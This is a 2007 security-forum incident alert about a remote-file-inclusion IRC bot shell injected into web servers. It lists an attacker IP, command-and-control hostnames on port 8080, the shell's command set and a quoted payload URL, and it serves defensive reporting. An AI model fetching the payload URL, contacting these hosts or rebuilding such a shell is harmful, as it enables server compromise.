Paul
CastleCops Founder
Joined: Feb 22, 2002
Posts: 27351
|
 Posted: Sat Dec 01, 2007 1:38 am Post subject: [WsIRT#195] IRC Bot Shell @AS8342 |
|
|
Attack Alert
Full Report:  /IRC_Bot_Shell_attack195.html
Changed status to .
IP Converted: 195.161.119.84
dword = 3282138964
hex1 = 0xc3a17754
hex2 = 0xc3.0xa1.0x77.0x54
oct = 0303.0241.0167.0124
Attackers are attempting to inject this script into vulnerable remote web servers. Once it is successfully installed illegally onto a web server, it attempts an fsockopen connection to one of the following destinations on port 8080:
sunnyplaces.weedns.com
mymusicplace.weedns.com
dns4.bpa.nu
dns3.bpa.nu
dns2.bpa.nu
dns1.bpa.nu
snes.dnip.ne
snes.opendns.be
nses1.dd.blueline.be
xamyx.dnip.net
At which point it randomly generates a user and a nick for what appears to be an IRC-like connection. A real sample is shown once it has logged in:
"MODE cafkassps -x i"
"JOIN ##p md5hash"
"NICK cafkassps"
One of its responses include:
"NOTICE :VERSION mIRC 6.26 BY Khaled Mardam-Bay"
This script is setup for the attacker to read in commands such as:
ls, cmd, pwd, chown, chmod, get, rm, cd, touch, cat, symlink, uname, opme
et cetera.
The script attempts to be obfuscated. It is nefarious in nature and should be removed immediately. All evidence surrounding the installation of the script should be preserved and sent to law enforcement referencing this ticket.
View CIDR AS8342 Report: http://www.cidr-report.org/cgi-bin/as-report?as=8342
"8342 | RU | ripencc | 1997-06-11 | RTCOMM-AS RTComm.RU Autonomous System"<br />
Extended information for AS8342:
State/Province:
Country: ru
Responsible Domain: rtcomm.ru
Abuse Email: security@rtcomm.ru
Changed status to confirmed attack.
| Quote: | | http://hotraebywka.chat.ru/images/girl? |
|
|
Forum FAQ
Search
Usergroups
Profile
Login to check your private messages
Login
